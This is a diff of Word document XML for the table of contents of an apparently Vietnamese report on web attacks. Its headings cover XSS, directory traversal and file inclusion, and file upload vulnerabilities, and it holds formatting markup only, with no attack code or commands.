-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:b/>
-            <w:bCs/>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>Tiểu mục cấp 2</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:tab/>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:fldChar w:fldCharType="begin"/>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc207351936 \h </w:instrText>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:fldChar w:fldCharType="separate"/>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:t>2</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:fldChar w:fldCharType="end"/>
-        </w:r>
-      </w:hyperlink>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="TOC3"/>
-        <w:tabs>
-          <w:tab w:val="left" w:pos="1440"/>
-          <w:tab w:val="right" w:leader="dot" w:pos="8211"/>
-        </w:tabs>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:noProof/>
-        </w:rPr>
-      </w:pPr>
-      <w:hyperlink w:anchor="_Toc207351937" w:history="1">
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:eastAsia="ja-JP"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc208343447" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -2203,12 +1748,17 @@
             <w:iCs/>
             <w:noProof/>
           </w:rPr>
-          <w:t>4.1.1.</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:noProof/>
+          <w:t>2.1.2.</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+            <w:noProof/>
+            <w:kern w:val="0"/>
+            <w:sz w:val="22"/>
+            <w:szCs w:val="22"/>
+            <w:lang w:eastAsia="ja-JP"/>
+            <w14:ligatures w14:val="none"/>
           </w:rPr>
           <w:tab/>
         </w:r>
@@ -2222,11 +1772,2153 @@
             <w:iCs/>
             <w:noProof/>
           </w:rPr>
+          <w:t>Các dạng tấn công phổ biến</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="begin"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc208343447 \h </w:instrText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="separate"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:t>1</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="end"/>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TOC3"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="1320"/>
+          <w:tab w:val="right" w:leader="dot" w:pos="8211"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+          <w:noProof/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:eastAsia="ja-JP"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc208343448" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:b/>
+            <w:bCs/>
+            <w:i/>
+            <w:iCs/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>2.1.3.</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+            <w:noProof/>
+            <w:kern w:val="0"/>
+            <w:sz w:val="22"/>
+            <w:szCs w:val="22"/>
+            <w:lang w:eastAsia="ja-JP"/>
+            <w14:ligatures w14:val="none"/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:b/>
+            <w:bCs/>
+            <w:i/>
+            <w:iCs/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>Hậu quả và ví dụ thực tế</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="begin"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc208343448 \h </w:instrText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="separate"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:t>1</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="end"/>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TOC2"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="880"/>
+          <w:tab w:val="right" w:leader="dot" w:pos="8211"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+          <w:noProof/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:eastAsia="ja-JP"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc208343449" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:b/>
+            <w:bCs/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>2.2.</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+            <w:noProof/>
+            <w:kern w:val="0"/>
+            <w:sz w:val="22"/>
+            <w:szCs w:val="22"/>
+            <w:lang w:eastAsia="ja-JP"/>
+            <w14:ligatures w14:val="none"/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:b/>
+            <w:bCs/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>Tấn công Cross-Site Scripting (XSS)</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="begin"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc208343449 \h </w:instrText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="separate"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:t>1</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="end"/>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TOC3"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="1320"/>
+          <w:tab w:val="right" w:leader="dot" w:pos="8211"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+          <w:noProof/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:eastAsia="ja-JP"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc208343450" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:b/>
+            <w:bCs/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>2.2.1.</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+            <w:noProof/>
+            <w:kern w:val="0"/>
+            <w:sz w:val="22"/>
+            <w:szCs w:val="22"/>
+            <w:lang w:eastAsia="ja-JP"/>
+            <w14:ligatures w14:val="none"/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:b/>
+            <w:bCs/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>Cơ chế hoạt động</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="begin"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc208343450 \h </w:instrText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="separate"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:t>2</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="end"/>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TOC3"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="1320"/>
+          <w:tab w:val="right" w:leader="dot" w:pos="8211"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+          <w:noProof/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:eastAsia="ja-JP"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc208343451" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:b/>
+            <w:bCs/>
+            <w:i/>
+            <w:iCs/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>2.2.2.</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+            <w:noProof/>
+            <w:kern w:val="0"/>
+            <w:sz w:val="22"/>
+            <w:szCs w:val="22"/>
+            <w:lang w:eastAsia="ja-JP"/>
+            <w14:ligatures w14:val="none"/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:b/>
+            <w:bCs/>
+            <w:i/>
+            <w:iCs/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>Các dạng tấn công và dặc điểm</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="begin"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc208343451 \h </w:instrText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="separate"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:t>2</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="end"/>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TOC3"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="1320"/>
+          <w:tab w:val="right" w:leader="dot" w:pos="8211"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+          <w:noProof/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:eastAsia="ja-JP"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc208343452" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:b/>
+            <w:bCs/>
+            <w:i/>
+            <w:iCs/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>2.2.3.</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+            <w:noProof/>
+            <w:kern w:val="0"/>
+            <w:sz w:val="22"/>
+            <w:szCs w:val="22"/>
+            <w:lang w:eastAsia="ja-JP"/>
+            <w14:ligatures w14:val="none"/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:b/>
+            <w:bCs/>
+            <w:i/>
+            <w:iCs/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>Hậu quả</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="begin"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc208343452 \h </w:instrText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="separate"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:t>2</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="end"/>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TOC2"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="880"/>
+          <w:tab w:val="right" w:leader="dot" w:pos="8211"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+          <w:noProof/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:eastAsia="ja-JP"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc208343453" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:b/>
+            <w:bCs/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>2.3.</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+            <w:noProof/>
+            <w:kern w:val="0"/>
+            <w:sz w:val="22"/>
+            <w:szCs w:val="22"/>
+            <w:lang w:eastAsia="ja-JP"/>
+            <w14:ligatures w14:val="none"/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:b/>
+            <w:bCs/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>Tấn công Directory Traversal và File Inclusion</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="begin"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc208343453 \h </w:instrText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="separate"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:t>2</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="end"/>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TOC3"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="1320"/>
+          <w:tab w:val="right" w:leader="dot" w:pos="8211"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+          <w:noProof/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:eastAsia="ja-JP"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc208343454" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:b/>
+            <w:bCs/>
+            <w:i/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>2.3.1.</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+            <w:noProof/>
+            <w:kern w:val="0"/>
+            <w:sz w:val="22"/>
+            <w:szCs w:val="22"/>
+            <w:lang w:eastAsia="ja-JP"/>
+            <w14:ligatures w14:val="none"/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:b/>
+            <w:bCs/>
+            <w:i/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>Cơ chế hoạt động và phân loại</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="begin"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc208343454 \h </w:instrText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="separate"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:t>2</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="end"/>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TOC3"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="1320"/>
+          <w:tab w:val="right" w:leader="dot" w:pos="8211"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+          <w:noProof/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:eastAsia="ja-JP"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc208343455" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:b/>
+            <w:bCs/>
+            <w:i/>
+            <w:iCs/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>2.3.2.</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+            <w:noProof/>
+            <w:kern w:val="0"/>
+            <w:sz w:val="22"/>
+            <w:szCs w:val="22"/>
+            <w:lang w:eastAsia="ja-JP"/>
+            <w14:ligatures w14:val="none"/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:b/>
+            <w:bCs/>
+            <w:i/>
+            <w:iCs/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>Hậu quả</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="begin"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc208343455 \h </w:instrText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="separate"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:t>2</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="end"/>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TOC2"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="880"/>
+          <w:tab w:val="right" w:leader="dot" w:pos="8211"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+          <w:noProof/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:eastAsia="ja-JP"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc208343456" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:b/>
+            <w:bCs/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>2.4.</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+            <w:noProof/>
+            <w:kern w:val="0"/>
+            <w:sz w:val="22"/>
+            <w:szCs w:val="22"/>
+            <w:lang w:eastAsia="ja-JP"/>
+            <w14:ligatures w14:val="none"/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:b/>
+            <w:bCs/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>Lỗ hổng tải lên tệp (File Upload Vulnerability)</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="begin"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc208343456 \h </w:instrText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
